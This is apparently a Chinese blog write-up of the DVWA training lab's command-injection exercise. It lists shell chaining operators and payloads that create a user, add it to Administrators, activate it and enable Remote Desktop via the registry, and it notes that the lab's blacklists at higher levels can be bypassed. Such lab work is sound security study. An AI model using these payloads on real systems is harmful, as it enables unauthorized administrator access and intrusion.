DVWA靶场 之Command Injection。

说明:这个靶场在虚拟机中,用主机通过靶场的漏洞远程连接虚拟机。

命令拼接:

|:管道符,直接执行后面的语句。

||:前面的语句出错时才执行后面的语句。

&:无论前面的语句是真是假都会执行后面的语句。

&&:前面的语句为真才执行后面的语句。

DVWA Security:Low

创建用户c: 127.0.0.1&net user c /add

显示所有用户:127.0.0.1&net user

将c添加到管理员组: 127.0.0.1&net localgroup Administrators c /add

激活用户: 127.0.0.1|net user c /active:yes

将名为fDenyTSConnections 的注册表项设为 0,以允许远程桌面连接:127.0.0.1 | add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看计算机名以进行远程连接:127.0.0.1|hostname

现在就可以进行远程连接了。

正常来说需要密码才能连接,因为这个用户没有设密码,但是又需要密码才能连接,所以连接不了。现实中的电脑大多数都有密码,所以尽管发现了可以远程连接的漏洞大概率也还是要进行一次密码枚举才能够真正远程连接上别人的电脑。

分析源代码:

DVWA Security:medium

虽然这一关进行了黑名单验证,但是黑名单很不完整,所以基本不影响操作。

DVWA Security:high

虽然这一级有着更完整的黑名单验证,但其实还是换汤不换药。需要注意的是它过滤的是“| ”,管道符后面有个空格,但是我的代码127.0.0.1|net user没有空格,所以这个黑名单验证了个寂寞。

  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

“Script Kid”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值